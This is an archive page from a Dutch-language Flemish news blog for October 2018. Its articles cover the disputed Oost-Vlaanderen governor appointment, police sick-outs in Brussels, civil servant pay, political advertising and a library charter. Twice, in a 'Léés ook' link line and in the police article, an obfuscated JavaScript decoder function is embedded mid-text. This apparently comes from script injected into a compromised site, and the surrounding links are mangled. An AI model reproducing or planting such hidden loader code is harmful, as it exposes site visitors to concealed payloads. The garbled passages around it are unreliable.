Archief oktober, 2018

Reacties uitgeschakeld voor N-VA en Open VLD op ramkoers over gouverneur Oost-Vlaanderen

N-VA en Open VLD op ramkoers over gouverneur Oost-Vlaanderen

Door | 30 oktober 2018 | Nieuws

Bron : De Tijd 26 oktober 2018 /+  eigen berichtgeving

Vlaams minister van Binnenlands Bestuur Liesbeth Homans (N-VA) schuift Wim Leerman, de directeur van de stad Aalst, naar voren als toekomstig gouverneur van Oost-Vlaanderen, maar Open VLD stelt haar veto. Zij willen Kamerlid Carina Van Cauter (Open VLD).
De benoeming van een nieuwe gouverneur in Oost-Vlaanderen verdeelt de Vlaamse regering. Afgelopen vrijdag deed Vlaams minister van Binnenlands Bestuur Liesbeth Homans (N-VA) een voorstel, maar dat botste op een njet van Open VLD. Deze week spraken de topministers van de Vlaamse regering daarom met de 15 kandidaten die door een selectiebureau werden gekozen.
Wie is Wim Leerman?

Leerman is sinds 2013 algemeen directeur van de stad Aalst en politiesecretaris van de Politiezone Aalst. Als stads- en politiesecretaris maakt hij deel uit van het burgemeester van college en schepenen in Aalst. Hij is ook lid van de raad van bestuur van de Vereniging van Vlaamse Steden en Gemeenten (VVSG). Tot begin dit jaar was hij ook secretaris van het OCMW van Aalst.

In het begin van zijn carrière werkte hij als OCMW-secretaris in staden en Vleteren en bij de VVSG. Nadien was hij secretaris van het OCMW van Geraardsbergen.
Op basis van die gesprekken schoof Liesbeth Homans (N-VA) vandaag Wim Leerman naar voren, de directeur van stad Aalst. Hij kwam volgens Homans als beste uit de selectieprocedure. Leerman heeft lang geleden eens op een lijst van de Volksunie gestaan, maar wordt door de N-VA als politiek onafhankelijk gezien.
Elders in de regering wordt die politieke onafhankelijkheid evenwel in twijfel getrokken. 'Hij is de neef van N-VA-ondervoorzitter Sander Loones en is een gewezen gemeenteraadslid voor de Volksunie in Koksijde. En hij startte zijn carrière op het kabinet-Sauwens.'
Bij N-VA wordt kregelig gereageerd op de link met de N-VA. 'De tante van Wim Leerman is Martine Lesaffre van Open VLD Oostende', klinkt het.
De Vlaamse liberalen kanten zich tegen de benoeming van Leerman. Zij willen graag Carina Van Cauter -Kamerlid voor Open VLD - als gouverneur aanduiden. Homans vindt dat zeer bizar. 'De liberalen hebben een onafhankelijke procedure gevraagd. Die is er nu. Maar nu willen ze Van Cauter aanduiden, terwijl Leerman als beste uit de selectieprocedure is gekomen.'
Homans zegt voet bij stuk te houden. 'Ik blijf bij mijn voordracht. Als ik daarvan afwijk, is de kans groot dat andere kandidaten naar de Raad van State stappen.' Homans zegt dat ze de steun heeft van CD&V.
De liberalen zijn dan weer van mening dat de N-VA het Van Cauter niet gunnen. 'Zij mag het niet worden van de N-VA', klinkt het in liberale kringen.

Open procedure

De nieuwe procedure die door de Vlaamse regering voor het eerst werd getest om een gouverneur aan te duiden blijkt dus weinig succesvol. Iedereen kon meedingen naar de gouverneurspost. Op die manier wilde de Vlaamse regering een breuk maken met het verleden, toen de posten van de gouverneur verdeeld werden onder de meerderheidspartijen. Die open procedure kwam er op vraag van Open VLD.
Bij de aanwijzing van Briers, de voormalige topman van het Festival van Vlaanderen, koos de N-VA vorige keer bewust niet voor een politieke benoeming. De liberalen aasden toen al op de Oost-Vlaamse gouverneurspost, maar zaten toen op Vlaams niveau in de oppositie. Toch wilden ze zich niet zomaar neerleggen bij de beslissing van de N-VA. Het uiteindelijke compromis bestond erin dat de gouverneur in de toekomst via een selectieprocedure zou worden gezocht, maar nu leidt de benoeming uiteindelijk weer tot politiek getouwtrek.
Vermits Jan Briers, de huidige gouverneur, binnen enkele dagen met pensioen gaat wordt een waarnemend gouverneur aangeduid. Het gaat om arrondissementscommissaris Didier Detollenaere. Hij is de adjunct van de gouverneur. Hoe het daarna verder moet, is niet duidelijk. 'De tijd moet raad brengen', luidt het op het Martelaarsplein.

Hoe dan ook heeft de selectieprocedure ervoor gezorgd dat een kandidaat uit de administratie nu naar voor wordt geschoven. Een moeilijk gegeven dus als het resultaat van een selectieprocedure niet aan alle partijen bevalt...

Léés ook: function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen/">Veel mist rond zoektocht gouverneur Oost-Vlaanderen

Léés ook: Iedereen kan gouverneur worden of toch niet ?

Reacties uitgeschakeld voor Uitvoeringsbesluit decreet Vlaams doelgroepenbeleid

Uitvoeringsbesluit decreet Vlaams doelgroepenbeleid

Door | 27 oktober 2018 | Nieuws

Beslissingen Vlaamse Regering, 26 / 10/ 2018
Na adviezen van de SERV en van de Raad van State keurt de Vlaamse Regering definitief het uitvoeringsbesluit goed bij het decreet over het Vlaamse doelgroepenbeleid. Met de maatregelen binnen het Vlaamse doelgroepenbeleid wil de Vlaamse Regering het aanwerven en het aan het werk houden van bepaalde werknemers met een grotere afstand tot de arbeidsmarkt bevorderen en de huidige maatregelen sterk vereenvoudigen.

Het Vlaams regeerakkoord 2014-2019 stelt drie doelgroepen voorop: jonge werknemers, 55-plussers en personen met een arbeidshandicap.

Het uitvoeringsbesluit wil het doelgroepenbeleid versterken door onder meer de doelgroepvermindering te verhogen voor zittende 60-plussers van 1.150 euro naar 1.500 euro/kwartaal; de vrijstelling van werkgeversbijdragen bij de aanwerving van niet-werkende werkzoekende 55-plussers gedurende 2 jaar; het uitbreiden van het bereik van de doelgroepvermindering voor oudere werknemers door het aanpassen van het loonplafond; de vrijstelling van werkgeversbijdragen bij de aanwerving van laaggeschoolde jongeren voor 2 jaar; het uitbreiden van de ondersteuning van personen met een indicatie arbeidshandicap via een Vlaamse Ondersteuningspremie met een tijdelijk karakter; en het aantrekkelijker maken van de Vlaamse Ondersteuningspremie voor zelfstandigen.

Reacties uitgeschakeld voor Aanstelling waarnemend gouverneur Oost-Vlaanderen

Aanstelling waarnemend gouverneur Oost-Vlaanderen

Door | 26 oktober 2018 | Nieuws

Beslissing Vlaamse Regering, dd. 26 / 10/2018

Bij besluit van de Vlaamse Regering van 23 maart 2018 werd aan Jan Briers, met ingang van 1 november 2018 eervol ontslag verleend uit zijn ambt van gouverneur van de provincie Oost-Vlaanderen. In afwachting van de benoeming van de nieuwe provinciegouverneur wordt Didier Detollenaere, met ingang van 1 november 2018, aangewezen tot waarnemend gouverneur van de provincie Oost-Vlaanderen. Hij zal de eed afleggen in handen van de Vlaamse minister van Binnenlands Bestuur, Inburgering, Wonen, Gelijke Kansen en Armoedebestrijding.

Reacties uitgeschakeld voor Is de politie ziek ?

Is de politie ziek ?

Door | 20 oktober 2018 | Nieuws

Bron: De Standaard 18/10/2018

| Bron: BELGA

'Een eerste bom is zonet ontploft binnen onze politiediensten'

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20181018_03855025">

Zeker 1.500 Brusselse politieagenten zaten de voorbije dagen 'ziek' thuis. Ze deden dat uit protest tegen de hoge werkdruk. Minister van Binnenlandse Zaken Jan Jambon (N-VA) komt de Brusselse politie wat tegemoet. Hij erkent de hoge werkdruk en belooft nieuwe aanwervingen. Tegelijkertijd noemt hij de sociale onrust bij de politie onterecht, de vakbond ACV reageert met een open brief.

Daar is politievakbond ACV het niet mee eens. 'Als je de druk blijft opvoeren en al de rode lampjes blijft negeren, ontploft vroeg of laat de bom. Een eerste bom is zonet ontploft binnen onze politiediensten', schrijft Joery Dehaes, secretaris van ACV Politie. Volgens hem negeert minister Jambon al maanden de vele noodkreten om meer personeel, middelen en respect.

'De arrogantie van de overheid ten opzichte van de vele verzuchtingen ontlokt nu een nieuwe reactie. Ditmaal niet bij de vakbonden, maar rechtstreeks vanop de werkvloer. Politiemensen melden zich massaal ziek', schrijft Dehaes. Volgens hem is dat ongezien, omdat politiemensen een bijzondere verantwoordelijkheidszin vertonen. 'De politiemensen hebben zich verzameld, ze zijn woedend en ze verwachten actie', aldus Dehaes.

Onrust

Jambon heeft de top van de federale en lokale politie gevraagd correcte informatie te verspreiden over een aantal dossiers die aan de basis liggen van sociale onrust binnen het politiekorps.

Zo is er de hervorming van het ziektekapitaal. Dat gaat over de niet-opgenomen ziektedagen die iemand kan opsparen doorheen zijn carrière. Hij bevestigde dat de hervorming ook voor de politie zal gelden, maar dat hij de vakbonden heeft duidelijk gemaakt dat er plaats is voor overgangsmaatregelen.

Wat de capaciteit betreft - een oud zeer - gaat aan het einde van het jaar een nieuwe rekruteringsprocedure van start, waarvoor ook budgetten worden vrijgemaakt.

Jambon zei ook de ontevredenheid van de vakbonden over de verloning niet te snappen. Er was immers een akkoord van drie van de vier vakbonden om het loon voor heel wat agenten volgend jaar op te krikken. Bovendien wordt niet geraakt aan het regime voor de weekends en de overuren, verzekerde de vicepremier.

Hij gaf tot slot aan dat elke suggestie om geweld tegen de politie aan te pakken, werd geïmplementeerd of binnenkort wordt geconcretiseerd. 'Mijn deuren staan open voor bijkomende maatregelen', aldus nog Jambon.

Meer dan duizend zieke agenten

De 1.500 ziekmeldingen deden zich voor in de zes Brusselse politiezones, het Defensiekorps en de Dienst Openbare Veiligheid.

De politievakbond NSPV ziet die meldingen als een signaal dat het water de agenten tot ver voorbij de lippen staat. 'Ik denk dat we al een tijdje onder water zitten', zegt Mario Thys, Brussels voorzitter van NSPV. 'We zeggen al maanden aan minister Jan Jambon dat het onleefbaar is, maar hij heeft dat altijd naast zich gelegd, en dat heeft hij gisteren ook gedaan.'

'De politiek moet zich ten eerste de vraag stellen waar men op termijn en zelfs in 2040 naartoe wil met de politie. En ten tweede moet ze beslissen of ze politiemensen of politieambtenaren wil. Die vraag is cruciaal. Soms zijn we ambtenaren, de andere keer weer niet. Een eenvoudig voorbeeld is de Copernicus-toelage, waarvoor we niet beschouwd werden als ambtenaar', aldus Thys.

BVAS vraagt geen ziektebriefjes meer te schrijven voor ’zieke’ politiemensen

De Belgische Vereniging van Artsensyndicaten (BVAS) roept artsen intussen op geen welwillendheidsattesten af te leveren nu Brusselse politieagenten zich massaal ziek melden. De BVAS wijst erop dat de arts-patiëntrelatie een vertrouwensrelatie is die niet misbruikt mag worden om een ziektebriefje van een arts te verkrijgen.

‘Tekenen van ziekte zijn vaak subjectief en niet steeds te objectiveren tijdens één enkele raadpleging’, zegt de BVAS.

‘Vandaar ook dat een arts, om zijn anamnese af te nemen en om eventueel een attest op te maken, zich baseert op wat zijn patiënt zegt en dat de arts zijn patiënt ook a priori gelooft. Van patiënten wordt gevraagd dat ze die vertrouwensrelatie met hun arts niet misbruiken om een medisch niet-gerechtvaardigd ziektebriefje te bekomen.’

Een anamnese is wat een patiënt over de voorgeschiedenis en de relevante omstandigheden van zijn ziekte of aandoening aan een zorgverlener kan vertellen.

Reacties uitgeschakeld voor ‘Kunnen burgemeesters de wereld redden?’

‘Kunnen burgemeesters de wereld redden?’

Door | 20 oktober 2018 | Nieuws

Bron: Knack, 19 oktober 2018

‘Democratie is meer dan om de 6 jaar naar de stembus trekken. Het is ook luisteren en samenwerken met diegenen die de handen uit de mouwen steken', schrijft Bogdan Vanden Berghe van 11.11.11.

"Kunnen burgemeesters de wereld redden?" Een google-opdracht leert me dat ik niet de eerste ben die zich deze vraag stelt. De meest bekende politicoloog die deze stelling poneerde is wijlen Benjamin Barber die in 2013 het boek schreef 'If mayors ruled the world'. Daarin hield hij een vurig pleidooi voor het oprichten van een wereldwijd parlement van burgemeesters omdat natiestaten te log en te groot zijn geworden om nog echt democratisch en oplossingsgericht te werken. Dichter bij huis hoor je in dit debat al wel eens Eric Corijn, emeritus hoogleraar en deskundige stedelijke planologie, deze stelling innemen. Hij argumenteert ook dat steden onder een aantal voorwaarden de wereld kunnen redden.

Kunnen burgemeesters de wereld redden?

Wat beide deskundigen in ieder geval zeer duidelijk naar voren schuiven, en waar wij vanuit 11.11.11 ook al jaren in geloven, is dat de mondiale problemen ook uitdagingen zijn voor het lokale niveau. Het zijn immers onze steden en gemeenten die het eerst geconfronteerd worden met de problematiek van een tekort aan opvangplaatsen voor mensen die migreren of vluchten, het is in steden en gemeenten waar we schaduw zoeken wanneer de hittegolven ons land in de zomer teisteren, het is in steden en gemeenten waar we onze huizen verwarmen en met onze auto rondrijden en waar we dus maatregelen kunnen nemen met betrekking tot onze CO2-uitstoot om de klimaatverandering tegen te gaan. Het is ook daar waar armen op zoek gaan naar onderdak en voedsel als ze er zelf niet meer voor kunnen.

Maar dat niet alleen, steden en gemeenten zijn ook de plek waar we als burger ons engagement opnemen. Waar we vanuit een houding tot wereldburgerschap allemaal proberen bij te dragen aan een leefbare samenleving , voor onszelf en voor onze toekomstige generaties. Of het nu is door een nieuwe burgerbeweging op te richten die ijvert voor zuivere lucht in de stad, of door het vrijwilligerswerk voor de verzorging van chronische zieken , of door het helpen van nieuwkomers bij het leren van de Nederlandse taal, burgers geven de stad of de gemeente mee vorm door het engagement dat ze dag in dag uit opnemen.

En zo ook de duizenden vrijwilligers van 11.11.11 en zijn lidorganisaties. Al jaren ijveren zij in hun gemeente of stad voor een lokaal beleid met een vizier op de problemen in de rest van de wereld. Door het organiseren van koffiestops voor Broederlijk Delen, dag in dag uit de Oxfam-Wereldwinkel te bemannen, geld in te zamelen voor hun eigen 4de Pijlerproject in het Zuiden of straks in november weer aan de slag te gaan met onze overkoepelende 11.11.11-campagne, die dit jaar opnieuw in teken staat van migratie. Al deze kleine lokale initiatieven helpen via de gemeente of stad waarin ze plaatsvinden de wereld weer een stukje vooruit.

Duurzame ontwikkeling

Maar wat velen misschien niet weten, is dat tal van deze burgers en vrijwilligers lokaal ook samen de handen in elkaar slaan om het beleid van hun lokale bestuur onder de loep te nemen. Via de Gemeentelijke Raden voor Ontwikkelingssamenwerking of via burgerinitiatieven proberen ze advies te verlenen aan hun bestuur voor een goed lokaal mondiaal beleid dat aansluit bij de drie jaar geleden op internationaal niveau afgesproken agenda voor duurzame ontwikkeling (SDG's). Omdat ook zij geloven dat burgemeesters de wereld kunnen redden.

Naar aanleiding van de gemeenteraadsverkiezingen vorige zondag schreven vele van deze lokale adviesraden en burgerinitiatieven een memorandum voor de politici in hun gemeente. Daarin doen ze een aantal aanbevelingen over hoe het toekomstige bestuur kan bijdragen aan een leefbare, vredevolle en duurzamere wereld voor iedereen.

En samen met onze vrijwilligers deden ook tal van andere burgers en organisaties, die elke dag werken rond armoede, mobiliteit, cultuur, minderhedenjeugd en milieu. dit ook.

Daarom beste toekomstige burgemeester, doe ik aan u de warme oproep om voor het volgende beleid dat u uitstippelt voor uw stad of gemeente, deze memoranda en aanbevelingen van uw inwoners ter harte te nemen. Ik hoop dat u ook gedurende de legislatuur blijft openstaan voor wat leeft in uw gemeente. Want democratie is nu eenmaal meer dan om de 6 jaar naar de stembus trekken. Het is ook luisteren en samenwerken met diegenen die de handen uit de mouwen steken.

Zo kan u straks samen met uw inwoners én met uw nieuwe beleidsplannen aantonen dat steden en gemeenten wel degelijk de wereld kunnen redden.

Reacties uitgeschakeld voor VRT Nieuws en De Tijd willen politieke advertenties in kaart te brengen

VRT Nieuws en De Tijd willen politieke advertenties in kaart te brengen

Door | 12 oktober 2018 | Nieuws

Bron: VRT nieuws , 12/10/2018 OPINIE Politici, gebruik de nieuwe reclame, maar stop de hypocrisie
VRT NWS en De Tijd willen met uw hulp in kaart brengen hoe Vlaamse partijen en politici campagne voeren op Facebook. Jeroen VAn Godtsenhoven wijst op het belang van duidelijke regels bij dit soort campanges via sociale media.

Artificiële Intelligentie (AI) en analytics worden door de politiek druk gebruikt om hun boodschap op een gerichte manier bij het juiste kiespubliek te krijgen. Dat zou je nochtans niet zeggen als je de politici te keer hoort gaan tegen Facebook en Google, die dezelfde praktijken op een commerciële manier toepassen. Er is niets mis met het gebruik van moderne hulpmiddelen, maar een gebrek aan transparantie vergiftigt het debat.

“Wat is de kans dat iemand gaat stemmen? En wat is de kans dat hij of zij onze kandidaat kiest?” Aan de hand van data kende het kamp van toen nog Amerikaans presidentskandidaat Obama het antwoord op die vragen. De slimme campagneleiders lieten er hun strategie door bepalen. Vier jaar later, in 2012, deden ze dat kunstje nog eens over.

De campagne werd bijna helemaal geleid door big data analyse, niet alleen op het vlak van politieke advertenties, maar ook de timing en locatie van rallies en het bepalen van de boodschap werden er door gestuurd. “Briljant”, klonk het toen vrijwel unaniem in de internationale pers. De ‘domme’ republikeinen hadden onvoldoende geïnvesteerd in de hedendaagse technologische mogelijkheden, met alle gevolgen van dien.

Vier jaar later wint Trump de presidentsverkiezingen door op het elan van Obama verder te bouwen, en de berichtgeving slaat helemaal om. Door AI en analytics gestuurde politieke marketing - vier jaar eerder nog revolutionair - is plots des duivels. Ook onze politici keren hun kar en trekken ten strijde tegen de sociale media. Mark Zuckerberg mag het komen uitleggen in het Europees parlement, en Google kijkt aan tegen een nieuwe monsterboete omwille van zijn Adsense-platform, dat targeted advertising mogelijk maakt.

Politici zijn fan
Ondanks de polemiek ben ik er echter van overtuigd dat politieke marketing, die gebruik maakt van AI, analytics en doelgerichte (online) advertenties, op zich een goede zaak is.
Politici vinden dat duidelijk ook. Ondanks hun publieke verguizing van de praktijken, maken ze er allemaal gretig gebruik van. Bij ons is de rol van big data kleiner dan in pakweg de VS, maar ook hier zoeken partijen hun toevlucht tot targeted advertising aan de hand van AI en big data.

Hun campagnes laten ze er (voorlopig) nog niet helemaal door leiden, al is de rol van de doelgerichte advertenties niet te miskennen. Zo krijgt iemand die veel vrijwilligerswerk doet en met armoede bezig is misschien advertenties van een bepaalde partij met standpunten aangaande armoedebestrijding, terwijl zijn buurman, een grote autofan, door dezelfde partij wordt aangesproken over het mobiliteitsbeleid.

Grenzen

Natuurlijk zijn er grenzen. In het geval van Trump is het duidelijk dat de spelregels niet werden gerespecteerd. Via Cambridge Analytica maakte de Trump-campagne gebruik van ongeoorloofd verkregen data, en zoiets kunnen we nooit goedkeuren. Als gegevens wel correct zijn verkregen, denk ik echter dat er niets mis is met gerichte politieke communicatie. Integendeel.

Als burger is het goed om op de hoogte te zijn van de standpunten van de politiek, zodat je geïnformeerd kan stemmen. Niet alles is natuurlijk even belangrijk voor iedereen. De notionele interestaftrek kan dan wel een heet hangijzer zijn in de sector, maar voor de doorsnee stedeling in het centrum van Brussel is het thema mobiliteit of groen in de stad waarschijnlijk belangrijker. Dat partijen dan bijvoorbeeld Facebook gebruiken om de juiste boodschappen op de juiste plaats te doen terechtkomen, is in dat opzicht net goed voor het debat.

Een waardige opvolger voor het verkiezingspamflet?

Gevaarlijk wordt het als politici te kwader trouw te werk gaan, en hun boodschap zodanig aanpassen aan een gewenst kiespubliek dat de waarheid oneer wordt aangedaan. Flagrante leugens, neergepend in een traditionele verkiezingsfolder, zouden snel in de media komen. Wanneer een advertentie doelgericht wordt uitgestuurd, is de kans echter klein dat een kritische geest ze ook onder ogen krijgt.

Extra regelgeving omtrent transparantie is hier dringend nodig. Ik denk dan bijvoorbeeld aan een verplichte opsomming van alle gebruikte advertenties door partijen, zodat journalisten bijvoorbeeld een oogje in het zeil kunnen houden.

Dat gebrek aan transparantie is momenteel een groot probleem. Het zorgt ervoor dat het gebruik van AI en analytics voor verkiezingsdoeleinden momenteel onterecht een slechte naam heeft. Het gaat om tools, die politici goed en slecht kunnen gebruiken. Het grote probleem is dat we momenteel geen zicht hebben op de manier waarop de politiek de tools inzet. Dat de mening van de politici naar een aversie voor doelgerichte marketing neigt, maar de acties het tegenovergestelde uitwijzen, zorgt terecht voor achterdocht.Zo stellen een overdosis hypocrisie en een gebrek aan transparantie de tools momenteel in een slecht daglicht.

Daarom verdienen de VRT en De Tijd een pluim op hun hoed. Zij onderzoeken de impact van targeted advertising door politieke partijen via sociale media. Dat zo’n onderzoek nodig is, is natuurlijk de kern van het probleem.

Het illustreert immers opnieuw mijn punt: terwijl de politiek terecht volledige transparantie eist van commerciële actoren die adverteren aan de hand van analyse van persoonsgegevens, stelt ze zichzelf boven de wet en geeft ze zelf te weinig prijs. Zodra AI en analytics op een juiste en transparante manier ingezet worden om boodschappen doelgericht naar het kiespubliek over te brengen, kunnen we eindelijk die gerichte advertenties inzetten, en de verouderde papieren verkiezingsbrochure voorgoed uit onze brievenbussen bannen.

Reacties uitgeschakeld voor Wat een Vlaamse ambtenaar verdient …

Wat een Vlaamse ambtenaar verdient …

Door | 4 oktober 2018 | Nieuws

Bron: Vacature.com, 4 oktober 2018

VACATURE.COM Een job bij de Vlaamse overheid? Dan hoef je weinig te speculeren over je salaris: Vlaamse ambtenaren worden vergoed volgens barema’s. Nog vooraleer je op sollicitatiegesprek gaat, kun je je loon dus al vrij accuraat berekenen. Net zoals in de privésector maak je ook bij de overheid kans op extralegale voordelen en toelagen. Dat zijn er meer dan twintig: van een hospitalisatieverzekering tot een competentiepremie. Een introductie.

1. Hoe berekent de Vlaamse overheid je loon?
Je krijgt een salaris op basis van vastgelegde schalen. Er zijn verschillende elementen die het salaris bepalen:
● niveau van de functie
● graad
● salarisschaal
● anciënniteit
Er zijn 4 functieniveaus (A, B, C of D). Het niveau hangt af van het diploma.
● A: masterdiploma of een daarmee gelijkgesteld diploma
● B: bachelordiploma of een daarmee gelijkgesteld diploma
● C: diploma secundair onderwijs
● D: geen diploma nodig
Binnen een niveau zijn er ook graden (A1, A2 …). Een graad vertegenwoordigt een groep van gelijkaardige functies die eenzelfde salaris krijgen. Aan elke graad wordt een salarisschaal gekoppeld.
Naast niveau, graad en salarisschaal, speelt ook anciënniteit een rol. Er zijn twee soorten: geldelijke anciënniteit en schaalanciënniteit.
● Geldelijke anciënniteit bouw je automatisch op tijdens je loopbaan, zowel als contractueel en als statutair ambtenaar. Voor de berekening kan je onder bepaalde voorwaarden je ervaring bij een andere werkgever laten meetellen.
● Schaalanciënniteit bouw je op als statutaire ambtenaar. Na een aantal jaren in dezelfde salarisschaal groei je automatisch door naar een volgende salarisschaal.

2. Salarissimulator
De Vlaamse overheid heeft een eigen salarissimulator waar werknemers hun loon tot op de komma kunnen berekenen. We gooiden 4 fictieve simulaties in de tool en kwamen tot de volgende resultaten.
A. Kaatje werkt op A-niveau in salarisschaal A111 en heeft tien jaar anciënniteit. Ze is statutair benoemd. Ze is gehuwd of wettelijk samenwonend en haar echtgenoot heeft een beroepsinkomen van > 221 euro. Ze ontvangt een haardtoelage. Ze heeft 2 kinderen ten laste.
Bruto: 3.873,92 euro loon, met 2.567,25 euro eindejaarstoelage en 3.564,01 euro vakantiegeld. Netto wordt dit: 2.440,55 euro loon, met 1.214,72 euro eindejaarstoelage en 1.647,04 euro vakantiegeld.
B. Ali werkt op B-niveau in salarisschaal B200 en heeft vijf jaar anciënniteit. Hij werkt als contractueel bediende. Hij is alleenstaand en heeft een 65+’er ten laste.
Bruto: 3.378,88 euro loon, met 2.239,18 euro eindejaarstoelage en 3.108,57 euro vakantiegeld. Netto wordt dit: 2.183,96 euro loon, met 1.017,93 euro eindejaarstoelage en 1.574,59 euro vakantiegeld.
C. Timmo werkt op C-niveau in salarisschaal C222 en heeft vijftien jaar anciënniteit. Hij werkt als contractueel arbeider. Hij woont wettelijk samen met een werkloze partner en krijgt een standplaatstoelage. Hij heeft 3 kinderen ten laste, waarvan 1 met een handicap.
Bruto: 3.699,60 euro loon, met 2.451,72 euro eindejaarstoelage en 3.403,63 euro vakantiegeld. Netto wordt dit: 2.790,51 euro loon, met 1.017,66 euro eindejaarstoelage en 1.572,92 euro vakantiegeld.
D. Anna werkt op D-niveau in salarisschaal D291 met een anciënniteit van 2 jaar, als contractueel arbeider. Ze is gehuwd of wettelijk samenwonend en haar echtgenoot heeft een beroepsinkomen van > 221 euro. Ze heeft 1 kind ten laste.
Bruto: 2.931,24 euro loon, met 2.159,74 euro eindejaarstoelage en 2.696,74 euro vakantiegeld. Netto wordt dit: 1.925,54 euro loon, met 981,81 euro eindejaarstoelage en 1.365,98 euro vakantiegeld.
Lees ook: Dit zijn de 10 best betaalde jobs in België

3. Wat met je voorgaande ervaring?
Heb je al ervaring wanneer je aan de slag gaat bij de Vlaamse overheid? Dan kan je in bepaalde gevallen die ervaring laten meetellen bij de berekening van je loon.
● Heb je al ervaring bij een andere overheidsdienst of een werkgever uit de publieke sector? Dan tellen je dienstjaren mee voor de berekening van je anciënniteit.
● Kom je uit de privésector of werk je als zelfstandige? Dan kunnen je gewerkte jaren meetellen als je nieuwe leidinggevende deze ‘functierelevant’ vindt.

4. Welke andere voordelen en tegemoetkomingen zijn er nog?
Naast het loon maak je bij de Vlaamse overheid nog kans op andere (financiële) voordelen, tegemoetkomingen, vergoedingen en toelagen zoals:
● Hospitalisatieverzekering
● Maaltijdcheques
● Tussenkomst woon-werkverkeer
● Internet en computer
● Persoonlijk gebruik dienstwagen
● Tussenkomst beeldschermbril
● Tussenkomst medische check-up 50+
● Rechtsbijstand
● Voordelige kinderopvang tijdens schoolvakanties
● Begrafenisvergoeding
● Opleidings- en vormingsaanbod
● Psychosociale en juridische hulp
● Griepvaccinatie
● Toelage voor dienstreizen
● Vakantiegeld en eindejaarstoelage
● Haard- en standplaatstoelage
● Toelage voor tijdelijke functieverzwaring
● Prestatietoelage
● Mandaattoelage
● Nacht-, zaterdag- en/of zondagsvergoedingen
● Permanentietoelage
● Oplage ploegenarbeid
● Overuren
● Gevaartoelage
● Kraamgeld en kinderbijslag
● Competentiepremie
● Toelagen voor specifieke personeelscategorieën zoals loodsen en luchthavenpersoneel

Reacties uitgeschakeld voor Een bibliotheek voor iedereen! ​Bibliotheekcharter

Een bibliotheek voor iedereen! ​Bibliotheekcharter

Door | 4 oktober 2018 | Nieuws

4 oktober 2018 – Bron: http://www.bibvooriedereen.be/charter.html

Iedereen is welkom in de openbare bibliotheek. Je vindt er computers en wifi, maar evengoed een fijn gesprek of een kopje koffie. Het is een veilige en toegankelijke plek, waar mensen met uiteenlopende achtergronden en opinies elkaar ontmoeten.

De bibliotheek draagt bij aan het maatschappelijke debat. Ze maakt mensen weerbaar in hun strijd tegen sociale ongelijkheid, discriminatie, onwetendheid en armoede. Ze versterkt haar lokale gemeenschap, garandeert gelijke kansen en biedt ontspanning.

Om dit elke dag opnieuw waar te maken, werkt een toegewijd team van bibliotheekmedewerkers en vrijwilligers samen met partners uit sectoren zoals cultuur, jeugd, onderwijs, economie en welzijn en met andere bibliotheken. Zo functioneert de openbare bibliotheek als knooppunt in lokale, regionale en Vlaamse netwerken en zet ze de noden van haar gebruikers centraal.
De openbare bibliotheek: een klavertje vier

De bibliotheek kan dit verwezenlijken, omdat zij beschikt over de nodige deskundigheid. Ze staat met twee voeten in de lokale gemeenschap. Het is een veilige en toegankelijke plek, waar je toegang tot informatie krijgt.
Door en voor de lokale gemeenschap

✓ De bibliotheek vormt een netwerk met lokale en regionale partners, zoals scholen, culturele organisaties, verenigingen of welzijnsdiensten.
✓ De bibliotheek beschikt over voldoende werkingsmiddelen om een professionele educatieve en sociale werking uit te bouwen.
​✓ Ze coördineert activiteiten voor specifieke doelgroepen in functie van lokale noden.
​✓ De bibliotheekbezoeker maakt mee de bibliotheek.
Een professionele werking

.✓ Je wordt er deskundig geholpen.
✓ De bibliotheek beschikt over voldoende medewerkers die correct verloond worden.
​✓ De bibliotheekmedewerkers krijgen genoeg kansen om zich bij te scholen.
Een veilige en toegankelijke plek

✓ Je kunt de bibliotheek vlot bereiken, ook met de fiets en met het openbaar vervoer.
​✓ Je ontdekt er uiteenlopende activiteiten. Er zijn leeshoekjes en studieplekken.
​✓ Het is een open huis waar je mensen ontmoet. Je kunt er ervaringen delen, in debat gaan of samen kennis creëren.
​✓ De bibliotheek beschikt over voldoende ruime openingsuren.
Toegang tot cultuur en informatie

✓ Voor iedereen ligt de drempel laag.
✓ Kinderen en jongeren tot 18 jaar kunnen gratis gebruik maken van alle diensten van de bib.
✓ Je ontdekt er een actueel aanbod aan boeken, tijdschriften, films … afgestemd op jouw wensen.
​✓ Je kunt er jouw expertise ontwikkelen en delen met anderen.
✓ Je hebt er toegang tot internet en digitale media.
✓ Je krijgt er begeleiding op maat, van de bibliotheek, van partners of van je buur.

Lijst van gemeenten die het charter hebben getekend

Reacties uitgeschakeld voor Bibliotheken vragen aandacht voor werking en personeel

Bibliotheken vragen aandacht voor werking en personeel

Door | 4 oktober 2018 | Nieuws

Bron: VRT -NIEUWS 4 oktober 2018 – Kristien Bonneure

